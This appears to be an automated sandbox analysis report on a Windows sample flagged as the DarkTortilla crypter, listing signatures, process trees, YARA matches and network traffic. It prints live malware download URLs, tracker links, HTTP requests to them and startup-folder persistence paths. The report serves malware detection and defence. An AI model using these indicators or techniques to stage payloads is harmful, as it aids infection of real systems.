Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1490825
MD5: a7f1b43bb75327181bf5535f6eab329d
SHA1: b7d03ad2e90ea8f81ba755c6e5c551e2686c679c
SHA256: 79cf97a156358a7dfba188f7b6d516e62279a11fb15b828bbd676b15633c008e
Tags: exe

Detection

DarkTortilla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
Connects to a pastebin service (likely for C&C)
Creates HTML files with .exe extension (expired dropper behavior)
Drops script or batch files to the startup folder
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 1060 cmdline: "C:\Users\user\Desktop\file.exe" MD5: A7F1B43BB75327181BF5535F6EAB329D)
    • InstallUtil.exe (PID: 4876 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cmd.exe (PID: 3224 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Q266LY31DJuBkUgU7rnVY9MU.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4024 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N7dCpczI2KMQNpAzS7xasjkw.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1524 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uknphp3q7QNTU5S7JDQd395T.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4416 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7jqZT4DOBm3RwAn2PcA575yH.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3648 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aQqevjV3RV9JJaF7h5x7Exf9.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7084 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pltF0lsLekfh4Kak6kjaROUd.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4616 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0aZULhs3yjKzrM4jdcsdY0pG.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6744 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bPdKjWiyihutETqOInbK2Mh7.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Malware family

Name: DarkTortilla
Description: DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging. From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla
No configs have been found
Yara matches (memory dumps)

Source | Rule | Description | Author
00000000.00000002.2640143868.0000000003F50000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security
00000000.00000002.2640143868.0000000003DFB000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security
00000000.00000002.2641880996.00000000051C0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security
00000000.00000002.2630838739.0000000002D01000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security
Process Memory Space: file.exe PID: 1060 | JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security

Yara matches (unpacked PE files)

Source | Rule | Description | Author
0.2.file.exe.2dc0be4.1.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
3.2.InstallUtil.exe.400000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
0.2.file.exe.3e60010.4.unpack | JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security
0.2.file.exe.3eb0030.3.unpack | JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security
0.2.file.exe.3eb0030.3.raw.unpack | JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security

Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, ProcessId: 4876, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Q266LY31DJuBkUgU7rnVY9MU.bat
No Suricata rule has matched
AV Detection

Source: file.exe | Avira: detected
Source: https://pastebin.com/raw/V6VJsrV3 | Avira URL Cloud: Label: malware
Source: https://yip.su/RNWPd.exe | Avira URL Cloud: Label: malware
Source: file.exe | ReversingLabs: Detection: 28%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.188.178:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: file.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\
Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\

Networking

Source: unknown | DNS query: name: pastebin.com
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: lHi4knFRqmK4FFdSjJjLFDSD.exe.3.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: 3BKVENDizermJCmNwCB42ME3.exe.3.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: ya3fW80pEvNY3Pp8eIbfmN8e.exe.3.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: vQTyYvkkcYOdC3ep2WUufnYJ.exe.3.dr
Source: Yara match | File source: 0.2.file.exe.2dc0be4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.2dcff80.0.raw.unpack, type: UNPACKEDPE
Source: global traffic | HTTP traffic detected: GET /raw/V6VJsrV3 HTTP/1.1; Host: pastebin.com; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /RNWPd.exe HTTP/1.1; Host: yip.su; Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /1djqU4 HTTP/1.1; Host: iplogger.com; Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 172.67.19.24
Source: Joe Sandbox View | IP Address: 188.114.96.3
Source: Joe Sandbox View | IP Address: 172.67.188.178
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: iplogger.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: pastebin.com
Source: global traffic | DNS traffic detected: DNS query: yip.su
Source: global traffic | DNS traffic detected: DNS query: iplogger.com
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 403 Forbidden
    Date: Fri, 09 Aug 2024 21:00:58 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
    Cross-Origin-Embedder-Policy: require-corp
    Cross-Origin-Opener-Policy: same-origin
    Cross-Origin-Resource-Policy: same-origin
    Origin-Agent-Cluster: ?1
    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
    Referrer-Policy: same-origin
    X-Content-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    cf-mitigated: challenge
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 403 Forbidden
    Date: Fri, 09 Aug 2024 21:01:29 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
    Cross-Origin-Embedder-Policy: require-corp
    Cross-Origin-Opener-Policy: same-origin
    Cross-Origin-Resource-Policy: same-origin
    Origin-Agent-Cluster: ?1
    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
    Referrer-Policy: same-origin
    X-Content-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    cf-mitigated: challenge
Source: file.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: file.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: file.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: file.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: file.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: file.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: file.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: file.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: file.exe | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: file.exe | String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe | String found in binary or memory: http://ocsp.digicert.com0A
Source: file.exe | String found in binary or memory: http://ocsp.digicert.com0C
Source: file.exe | String found in binary or memory: http://ocsp.digicert.com0X
Source: InstallUtil.exe, 00000003.00000002.3538302079.00000000031B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.3.dr | String found in binary or memory: http://upx.sf.net
Source: file.exe | String found in binary or memory: http://www.digicert.com/CPS0
Source: InstallUtil.exe, 00000003.00000002.3538302079.0000000003317000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://yip.su
Source: InstallUtil.exe, 00000003.00000002.3538302079.000000000331E000.00000004.00000800.00020000.00000000.sdmp, 3BKVENDizermJCmNwCB42ME3.exe.3.dr, lHi4knFRqmK4FFdSjJjLFDSD.exe.3.dr, vQTyYvkkcYOdC3ep2WUufnYJ.exe.3.dr, ya3fW80pEvNY3Pp8eIbfmN8e.exe.3.dr | String found in binary or memory: https://cdn.iplogger.org/favicon.ico
Source: InstallUtil.exe, 00000003.00000002.3538302079.000000000331E000.00000004.00000800.00020000.00000000.sdmp, 3BKVENDizermJCmNwCB42ME3.exe.3.dr, lHi4knFRqmK4FFdSjJjLFDSD.exe.3.dr, vQTyYvkkcYOdC3ep2WUufnYJ.exe.3.dr, ya3fW80pEvNY3Pp8eIbfmN8e.exe.3.dr | String found in binary or memory: https://cdn.iplogger.org/redirect/logo-dark.png);background-position:center;background-repeat:no-rep
Source: InstallUtil.exe, 00000003.00000002.3538302079.000000000331E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003258000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, 3BKVENDizermJCmNwCB42ME3.exe.3.dr, lHi4knFRqmK4FFdSjJjLFDSD.exe.3.dr, vQTyYvkkcYOdC3ep2WUufnYJ.exe.3.dr, ya3fW80pEvNY3Pp8eIbfmN8e.exe.3.dr | String found in binary or memory: https://counter.yadro.ru/hit?
Source: InstallUtil.exe, 00000003.00000002.3538302079.00000000031B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://iplogger.com/1djqU4
Source: InstallUtil.exe, 00000003.00000002.3538302079.000000000331E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003258000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, 3BKVENDizermJCmNwCB42ME3.exe.3.dr, lHi4knFRqmK4FFdSjJjLFDSD.exe.3.dr, vQTyYvkkcYOdC3ep2WUufnYJ.exe.3.dr, ya3fW80pEvNY3Pp8eIbfmN8e.exe.3.dr | String found in binary or memory: https://iplogger.org/
Source: InstallUtil.exe, 00000003.00000002.3538302079.000000000331E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003258000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, 3BKVENDizermJCmNwCB42ME3.exe.3.dr, lHi4knFRqmK4FFdSjJjLFDSD.exe.3.dr, vQTyYvkkcYOdC3ep2WUufnYJ.exe.3.dr, ya3fW80pEvNY3Pp8eIbfmN8e.exe.3.dr | String found in binary or memory: https://iplogger.org/privacy/
Source: InstallUtil.exe, 00000003.00000002.3538302079.000000000331E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003258000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, 3BKVENDizermJCmNwCB42ME3.exe.3.dr, lHi4knFRqmK4FFdSjJjLFDSD.exe.3.dr, vQTyYvkkcYOdC3ep2WUufnYJ.exe.3.dr, ya3fW80pEvNY3Pp8eIbfmN8e.exe.3.dr | String found in binary or memory: https://iplogger.org/rules/
Source: InstallUtil.exe, 00000003.00000002.3538302079.0000000003271000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com
Source: InstallUtil.exe, 00000003.00000002.3538302079.00000000031B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/V6VJsrV3
Source: file.exe, 00000000.00000002.2630838739.0000000002DC8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630838739.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630838739.000000000306C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3535416416.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/V6VJsrV31https://yip.su/RNWPd.exe7https://iplogger.com/1djqU4
Source: InstallUtil.exe, 00000003.00000002.3538302079.00000000032F9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003325000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003338000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003348000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003271000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.00000000031ED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: InstallUtil.exe, 00000003.00000002.3538302079.00000000032D3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.000000000336C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003348000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003271000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: InstallUtil.exe, 00000003.00000002.3538302079.0000000003317000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003271000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://yip.su
Source: InstallUtil.exe, 00000003.00000002.3538302079.000000000331E000.00000004.00000800.00020000.00000000.sdmp, 3BKVENDizermJCmNwCB42ME3.exe.3.dr, lHi4knFRqmK4FFdSjJjLFDSD.exe.3.dr, vQTyYvkkcYOdC3ep2WUufnYJ.exe.3.dr, ya3fW80pEvNY3Pp8eIbfmN8e.exe.3.dr | String found in binary or memory: https://yip.su/RNWPd
Source: InstallUtil.exe, 00000003.00000002.3538302079.00000000031B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://yip.su/RNWPd.exe
Source: InstallUtil.exe, 00000003.00000002.3538302079.000000000331E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003258000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, 3BKVENDizermJCmNwCB42ME3.exe.3.dr, lHi4knFRqmK4FFdSjJjLFDSD.exe.3.dr, vQTyYvkkcYOdC3ep2WUufnYJ.exe.3.dr, ya3fW80pEvNY3Pp8eIbfmN8e.exe.3.dr | String found in binary or memory: https://yip.su/redirect-
                      Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.6:49721 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49722 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 172.67.188.178:443 -> 192.168.2.6:49723 version: TLS 1.2
                      Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0918B4C8 CreateProcessAsUserW,0_2_0918B4C8
                      Source: file.exe | Static PE information: invalid certificate
                      Source: file.exe, 00000000.00000002.2649238421.00000000075C0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameRP8SH.dll, vs file.exe
                      Source: file.exe, 00000000.00000002.2630838739.0000000003107000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameNew.exe" vs file.exe
                      Source: file.exe, 00000000.00000002.2640143868.0000000003F50000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMiPro.dll, vs file.exe
                      Source: file.exe, 00000000.00000002.2628944034.00000000006BE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs file.exe
                      Source: file.exe, 00000000.00000002.2640143868.0000000003DFB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMiPro.dll, vs file.exe
                      Source: file.exe, 00000000.00000002.2630838739.0000000002DC8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameNew.exe" vs file.exe
                      Source: file.exe, 00000000.00000002.2630838739.0000000002D01000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameNew.exe" vs file.exe
                      Source: file.exe, 00000000.00000002.2641880996.00000000051C0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMiPro.dll, vs file.exe
                      Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: classification engine | Classification label: mal100.troj.expl.evad.winEXE@28/8@3/3
                      Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3512:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3380:120:WilError_03
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Mutant created: NULL
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6520:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5936:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3276:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3576:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5844:120:WilError_03
                      Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Q266LY31DJuBkUgU7rnVY9MU.bat" "
                      Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: file.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: file.exe | ReversingLabs: Detection: 28%
                      Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                      Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Q266LY31DJuBkUgU7rnVY9MU.bat" "
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N7dCpczI2KMQNpAzS7xasjkw.bat" "
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uknphp3q7QNTU5S7JDQd395T.bat" "
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7jqZT4DOBm3RwAn2PcA575yH.bat" "
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aQqevjV3RV9JJaF7h5x7Exf9.bat" "
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
